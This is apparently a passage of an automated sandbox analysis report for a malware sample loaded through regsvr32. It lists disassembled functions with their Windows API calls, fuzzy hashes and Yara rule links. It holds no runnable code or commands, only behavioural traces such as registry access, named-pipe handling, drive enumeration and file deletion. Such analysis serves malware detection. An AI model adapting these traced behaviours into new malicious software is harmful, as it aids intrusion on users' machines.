                Function 04BDEF27 Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BDEF49
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BDEF66
                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04BDEFB6
                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04BDEFC0
                • GetLastError.KERNEL32 ref: 04BDEFCA
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDEFDB
                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04BDEFFD
                • HeapFree.KERNEL32(00000000,?), ref: 04BDF034
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BDF048
                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04BDF051
                • SuspendThread.KERNEL32(?), ref: 04BDF060
                • CreateEventA.KERNEL32(04BEE268,00000001,00000000), ref: 04BDF074
                • SetEvent.KERNEL32(00000000), ref: 04BDF081
                • CloseHandle.KERNEL32(00000000), ref: 04BDF088
                • Sleep.KERNEL32(000001F4), ref: 04BDF09B
                • ResumeThread.KERNEL32(?), ref: 04BDF0BF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                • String ID:
                • API String ID: 1011176505-0
                • Opcode ID: ae2d8ae574d5d2d1666a2d2c5d680553cf0021eef0d39cfc30965a6bcebbc9d3
                • Instruction ID: bde0048486ac70316aaa5263a4aeca4a96dab5fec3cb9f6e5e70e6a656841533
                • Opcode Fuzzy Hash: ae2d8ae574d5d2d1666a2d2c5d680553cf0021eef0d39cfc30965a6bcebbc9d3
                • Instruction Fuzzy Hash: 60417372900509FFDB11AFB6DC8896DBBB9FB84304B0444AAF602EB111D739AD91DB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC7CA8 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memset.NTDLL ref: 04BC7CD6
                • StrChrA.SHLWAPI(?,0000000D), ref: 04BC7D1C
                • StrChrA.SHLWAPI(?,0000000A), ref: 04BC7D29
                • StrChrA.SHLWAPI(?,0000007C), ref: 04BC7D50
                • StrTrimA.SHLWAPI(?,04BEA4A4), ref: 04BC7D65
                • StrChrA.SHLWAPI(?,0000003D), ref: 04BC7D6E
                • StrTrimA.SHLWAPI(00000001,04BEA4A4), ref: 04BC7D84
                • _strupr.NTDLL ref: 04BC7D8B
                • StrTrimA.SHLWAPI(?,?), ref: 04BC7D98
                • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04BC7DE0
                • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000000,?,?,04BC158F), ref: 04BC7DFF
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                • String ID: $;
                • API String ID: 4019332941-73438061
                • Opcode ID: 90ece5766eb7281c63a36f01278eead3780f963b9efba789641c4dffd444e7f5
                • Instruction ID: af26e1eca12e2516f7b4201c13443c6fdab5ecc1f8b59324b9d259dc8929f0d0
                • Opcode Fuzzy Hash: 90ece5766eb7281c63a36f01278eead3780f963b9efba789641c4dffd444e7f5
                • Instruction Fuzzy Hash: EA4194725043079FD721EF298C84B2BBBEDEF94700F04089EF9959B241EB74E9058BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC76A4 Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(04BC158F,0000002C,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?), ref: 04BC76F3
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC770C
                • StrChrA.SHLWAPI(04BC158F,0000002C,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?), ref: 04BC7717
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC7730
                • lstrlen.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000), ref: 04BC77C8
                • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 04BC77EA
                • lstrcpy.KERNEL32(00000020,?), ref: 04BC7809
                • lstrlen.KERNEL32(?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BC7813
                • memcpy.NTDLL(?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?), ref: 04BC7854
                • memcpy.NTDLL(?,?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B), ref: 04BC7867
                • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057), ref: 04BC788B
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E), ref: 04BC78AA
                • HeapFree.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F), ref: 04BC78D0
                • HeapFree.KERNEL32(00000000,00000001,00000001,?,?,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F), ref: 04BC78EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                • String ID:
                • API String ID: 3323474148-0
                • Opcode ID: e162364f23d99a27c3b3b51e7c0e0aae3e45a94f425a72b3b2f3162e52bf9d61
                • Instruction ID: 5dffeffd7f689508be561b58f05fe14449fb501b71dbaef530e3204a33f2a561
                • Opcode Fuzzy Hash: e162364f23d99a27c3b3b51e7c0e0aae3e45a94f425a72b3b2f3162e52bf9d61
                • Instruction Fuzzy Hash: 2F718B31504306AFD721DF25C884A5BBBE8FB88314F0449AEF599D7251EB35E944CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC9DA0 Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,?,00000000), ref: 04BC9DB7
                • lstrlen.KERNEL32(?,?,00000000), ref: 04BC9DBE
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC9DD5
                • lstrcpy.KERNEL32(00000000,?), ref: 04BC9DE6
                • lstrcat.KERNEL32(?,?), ref: 04BC9E02
                • lstrcat.KERNEL32(?,?), ref: 04BC9E13
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC9E24
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC9EC1
                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 04BC9EFA
                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 04BC9F13
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04BC9F1D
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04BC9F2D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BC9F46
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04BC9F56
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                • String ID:
                • API String ID: 333890978-0
                • Opcode ID: 0b1f38d95dce55b6a14e171321aae48c94ff858b2acca85c71f348105d633918
                • Instruction ID: e3cc27de03b757f3c50e6bce02645de26dd10d968598f8351020f72fda5604d8
                • Opcode Fuzzy Hash: 0b1f38d95dce55b6a14e171321aae48c94ff858b2acca85c71f348105d633918
                • Instruction Fuzzy Hash: E45149B2800109FFEB11AFA5DC84CAE7BBDFB88344B05846AF615DB111D675AE059B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD1590 Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BDB89D: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04BDB8E2
                  • Part of subcall function 04BDB89D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04BDB8FA
                  • Part of subcall function 04BDB89D: WaitForSingleObject.KERNEL32(00000000,?,?,?,04BC140C,?), ref: 04BDB9C2
                  • Part of subcall function 04BDB89D: HeapFree.KERNEL32(00000000,?,?,?,?,04BC140C,?), ref: 04BDB9EB
                  • Part of subcall function 04BDB89D: HeapFree.KERNEL32(00000000,?,?,?,?,04BC140C,?), ref: 04BDB9FB
                  • Part of subcall function 04BDB89D: RegCloseKey.ADVAPI32(?,?,?,?,04BC140C,?), ref: 04BDBA04
                • lstrcmp.KERNEL32(?,00000000), ref: 04BD1607
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04BC133F,00000000,00000000), ref: 04BD1633
                • GetCurrentThreadId.KERNEL32 ref: 04BD16E4
                • GetCurrentThread.KERNEL32 ref: 04BD16F5
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,04BDA46B,04BC133F,00000001,74E5F730,00000000,00000000), ref: 04BD1732
                • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,04BDA46B,04BC133F,00000001,74E5F730,00000000,00000000), ref: 04BD1746
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD1754
                • wsprintfA.USER32 ref: 04BD176C
                  • Part of subcall function 04BC3FF7: lstrlen.KERNEL32(04BC158F,00000000,04BE6C5B,00000000,04BE4160,04BC158F,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC4001
                  • Part of subcall function 04BC3FF7: lstrcpy.KERNEL32(00000000,04BC158F), ref: 04BC4025
                  • Part of subcall function 04BC3FF7: StrRChrA.SHLWAPI(04BC158F,00000000,0000002E,?,00000003,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BC402C
                  • Part of subcall function 04BC3FF7: lstrcat.KERNEL32(00000000,?), ref: 04BC4083
                • lstrlen.KERNEL32(00000000,00000000), ref: 04BD1777
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BD178E
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BD179F
                • HeapFree.KERNEL32(00000000,?), ref: 04BD17AB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                • String ID:
                • API String ID: 773763258-0
                • Opcode ID: f0d4cb03f710410db83f0794a9de3fc56aad34596d9b95a8fa16fbbefb4e598a
                • Instruction ID: bf13e5a0b211dbf45ab3868dd83b77dd3b8182ef934a76cf82f061167f4c462d
                • Opcode Fuzzy Hash: f0d4cb03f710410db83f0794a9de3fc56aad34596d9b95a8fa16fbbefb4e598a
                • Instruction Fuzzy Hash: C8710371900219EFDB11DFA9DC84DEEBBB9FF48304F0480A6E505AB220E735AD45DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD5628 Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                Download Yara Rule
                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BD565A
                • WaitForSingleObject.KERNEL32(0000053C,00000000), ref: 04BD567C
                • ConnectNamedPipe.KERNEL32(?,?), ref: 04BD569C
                • GetLastError.KERNEL32 ref: 04BD56A6
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BD56CA
                • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 04BD570D
                • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04BD5716
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BD571F
                • CloseHandle.KERNEL32(?), ref: 04BD5734
                • GetLastError.KERNEL32 ref: 04BD5741
                • CloseHandle.KERNEL32(?), ref: 04BD574E
                • RtlExitUserThread.NTDLL(000000FF), ref: 04BD5764
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                • String ID:
                • API String ID: 4053378866-0
                • Opcode ID: 5bb0d1564f1081248835c333b899ec820e936898a37334aec9e9b4c9a88fc55c
                • Instruction ID: 46bd30ddc0222d8370f34e7e34f5412cc79ec38f3340439eddfd503d2bb273f0
                • Opcode Fuzzy Hash: 5bb0d1564f1081248835c333b899ec820e936898a37334aec9e9b4c9a88fc55c
                • Instruction Fuzzy Hash: 28318270004705BFE721AF25CC4896FBBA9FB84364F100A6AF565D71A0D774EE058BB6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC46C9 Relevance: 16.7, APIs: 11, Instructions: 155registrystringfileCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BC46F4
                  • Part of subcall function 04BC4B8D: RegCloseKey.ADVAPI32(?,?,?,04BE5181,00000000,00000000,00000000), ref: 04BC4C14
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BC472F
                • lstrcpyW.KERNEL32(-00000002,?), ref: 04BC4790
                • lstrcatW.KERNEL32(00000000,?), ref: 04BC47A5
                • lstrcpyW.KERNEL32(?), ref: 04BC47BF
                • lstrcatW.KERNEL32(00000000,?), ref: 04BC47CE
                  • Part of subcall function 04BC8D95: lstrlenW.KERNEL32(?,?,?,04BD71F4,?,?,?,?,00001000,?,?,00001000), ref: 04BC8DA8
                  • Part of subcall function 04BC8D95: lstrlen.KERNEL32(?,?,04BD71F4,?,?,?,?,00001000,?,?,00001000), ref: 04BC8DB3
                  • Part of subcall function 04BC8D95: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04BC8DC8
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 04BC4838
                  • Part of subcall function 04BE2531: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04BE523E,?), ref: 04BE253D
                  • Part of subcall function 04BE2531: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,04BE523E,?), ref: 04BE2565
                  • Part of subcall function 04BE2531: memset.NTDLL ref: 04BE2577
                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 04BC486D
                • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 04BC4878
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC488E
                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 04BC48A0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                • String ID:
                • API String ID: 1430934453-0
                • Opcode ID: e96349dc69f27713d495d69be52a25e0b096eef5613e7e7f6f78463d0171cc8c
                • Instruction ID: cfc8269c78e740bdf018c46441d2d7b054ddc6043a9457600db819f2146a4713
                • Opcode Fuzzy Hash: e96349dc69f27713d495d69be52a25e0b096eef5613e7e7f6f78463d0171cc8c
                • Instruction Fuzzy Hash: E5513A3190010AEBDB11EFA6DD94EAE77BDEF84304F1400AAE904AB151E735EE119B71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE44DD Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04BE4513
                • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 04BE4528
                • RegCreateKeyA.ADVAPI32(80000001,?), ref: 04BE4550
                • HeapFree.KERNEL32(00000000,00000001), ref: 04BE4591
                • HeapFree.KERNEL32(00000000,?), ref: 04BE45A1
                • RtlAllocateHeap.NTDLL(00000000,04BC5114), ref: 04BE45B4
                • RtlAllocateHeap.NTDLL(00000000,04BC5114), ref: 04BE45C3
                • HeapFree.KERNEL32(00000000,?,?,04BC5114,?,00000001,?,?), ref: 04BE460D
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,04BC5114,?,00000001), ref: 04BE4631
                • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,04BC5114,?,00000001), ref: 04BE4656
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04BC5114,?,00000001), ref: 04BE466B
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$CloseCreate
                • String ID:
                • API String ID: 4126010716-0
                • Opcode ID: 695829822781d1a035fc695395b6804af34ab11ef5388aa5d24db1171c4a7ed6
                • Instruction ID: 1880da62b861456fec9943f74dba991748b4ba25be22912a9eba49b56607ed6e
                • Opcode Fuzzy Hash: 695829822781d1a035fc695395b6804af34ab11ef5388aa5d24db1171c4a7ed6
                • Instruction Fuzzy Hash: 5A51ADB5900209EFDF01DFA6D8848EEBBB9FB88345F1044AAE505A6210D735AE95DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDFD82 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                Download Yara Rule
                APIs
                • wcscpy.NTDLL ref: 04BDFDB6
                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04BDFDC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BDFDD3
                • memset.NTDLL ref: 04BDFDF0
                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04BDFDFE
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BDFE0C
                • GetDriveTypeW.KERNEL32(?), ref: 04BDFE1A
                • lstrlenW.KERNEL32(?), ref: 04BDFE26
                • wcscpy.NTDLL ref: 04BDFE38
                • lstrlenW.KERNEL32(?), ref: 04BDFE52
                • HeapFree.KERNEL32(00000000,?), ref: 04BDFE6B
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                • String ID:
                • API String ID: 3888849384-0
                • Opcode ID: 77626d99ebdca3665dd402b7f72d48e6db4fb2437d5d672e34878eef7ae26448
                • Instruction ID: b334d02b7791823db66ba1068f08aa22682f35e10b3e5b1c62b0ac4162ba6c82
                • Opcode Fuzzy Hash: 77626d99ebdca3665dd402b7f72d48e6db4fb2437d5d672e34878eef7ae26448
                • Instruction Fuzzy Hash: EB310D32804118BFDB11ABA6DC48CEFBF79FF89350B104496E105E7111E739AA55DBB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCFEBD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04BCFED4
                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094), ref: 04BCFEE6
                • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094), ref: 04BCFEF3
                • wsprintfA.USER32 ref: 04BCFF0E
                • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,04BC78A1,00000000,00000094,00000000), ref: 04BCFF24
                • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04BCFF3D
                • WriteFile.KERNEL32(00000000,00000000), ref: 04BCFF45
                • GetLastError.KERNEL32 ref: 04BCFF53
                • CloseHandle.KERNEL32(00000000), ref: 04BCFF5C
                • GetLastError.KERNEL32(?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094,00000000), ref: 04BCFF6D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094), ref: 04BCFF7D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                • String ID:
                • API String ID: 3873609385-0
                • Opcode ID: 23a5a72b3341c8689b91a2b366aed402c546051eeab0383264cdc78148e7b831
                • Instruction ID: e869cb81c709e1036f21f3921801eade74b35c1700cb74e7380389d27f1c4044
                • Opcode Fuzzy Hash: 23a5a72b3341c8689b91a2b366aed402c546051eeab0383264cdc78148e7b831
                • Instruction Fuzzy Hash: 4011E471142518BFE3217B76ACCCF7B3B5DEB82359F0400AAF906D7181EA685D059671
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD1447 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(00000000,0000002C,7673D3B0,00000000,74E05520,74E5F710), ref: 04BD1478
                • StrChrA.SHLWAPI(00000001,0000002C), ref: 04BD148B
                • StrTrimA.SHLWAPI(00000000,?), ref: 04BD14AE
                • StrTrimA.SHLWAPI(00000001,?), ref: 04BD14BD
                • lstrlen.KERNEL32(00000000), ref: 04BD14F2
                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BD1505
                • lstrcpy.KERNEL32(00000004,00000000), ref: 04BD1523
                • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 04BD1547
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                • String ID: W
                • API String ID: 1974185407-655174618
                • Opcode ID: 95993890a8175b43c69ca92862101a7573e13aa32b7af1b9329b7e34f595e172
                • Instruction ID: 83e5590e19a716d7fca0229a7e8dd9c04c095654f121204a9f0e23d3ace96576
                • Opcode Fuzzy Hash: 95993890a8175b43c69ca92862101a7573e13aa32b7af1b9329b7e34f595e172
                • Instruction Fuzzy Hash: D3315E75900219FBDB119F79C889E9A7BB8EF88754F1480DAF5059B200E778EA40DBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD842E Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                Download Yara Rule
                APIs
                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BD84A5
                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BD84C4
                  • Part of subcall function 04BDD327: wsprintfA.USER32 ref: 04BDD33A
                  • Part of subcall function 04BDD327: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04BDD34C
                  • Part of subcall function 04BDD327: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04BDD376
                  • Part of subcall function 04BDD327: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BDD389
                  • Part of subcall function 04BDD327: CloseHandle.KERNEL32(?), ref: 04BDD392
                • GetLastError.KERNEL32 ref: 04BD8797
                • RtlEnterCriticalSection.NTDLL(?), ref: 04BD87A7
                • RtlLeaveCriticalSection.NTDLL(?), ref: 04BD87B8
                • RtlExitUserThread.NTDLL(?), ref: 04BD87C6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                • String ID:
                • API String ID: 1258333524-0
                • Opcode ID: b6b243c53391df570041933ec8aa9c72b547989df8fc09623678e69e97fa3c36
                • Instruction ID: 9cb3992a34dd09c72e5fd03cd80adcb2c266b5b8dfa875262dacb8ddcc2c2d4f
                • Opcode Fuzzy Hash: b6b243c53391df570041933ec8aa9c72b547989df8fc09623678e69e97fa3c36
                • Instruction Fuzzy Hash: 82B15E71500709AFEB20AF26CC84AAA7BF9FF48306F2045AAF569D6150E774EC54CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE3FEE Relevance: 15.1, APIs: 10, Instructions: 97filememorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD0C78: memset.NTDLL ref: 04BD0C9A
                  • Part of subcall function 04BD0C78: CloseHandle.KERNEL32(?,?,?,?,?), ref: 04BD0D44
                • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04BE4035
                • CloseHandle.KERNEL32(?), ref: 04BE4041
                • PathFindFileNameW.SHLWAPI(?), ref: 04BE4051
                • lstrlenW.KERNEL32(00000000), ref: 04BE405B
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BE406C
                • wcstombs.NTDLL ref: 04BE407D
                • lstrlen.KERNEL32(?), ref: 04BE408A
                • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 04BE40C9
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BE40DB
                • DeleteFileW.KERNEL32(?), ref: 04BE40E9
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                • String ID:
                • API String ID: 2256351002-0
                • Opcode ID: e52f86d21cefbf233199ed9aeb2197c14874a44ca664976699e0daa70ed42081
                • Instruction ID: 40e181d9a262d1328d6f68823cb8ec5bc3e696715e6b208cd714e618a11d190c
                • Opcode Fuzzy Hash: e52f86d21cefbf233199ed9aeb2197c14874a44ca664976699e0daa70ed42081
                • Instruction Fuzzy Hash: E431F671800109EBCF21AFA6D8898AE7B79FF84345B00446AFA02A7111DB359E64DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE2449 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                Download Yara Rule
                APIs
                • GetTickCount.KERNEL32 ref: 04BE2459
                • CreateFileW.KERNEL32(04BDA7DD,80000000,00000003,04BEE268,00000003,00000000,00000000,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2476
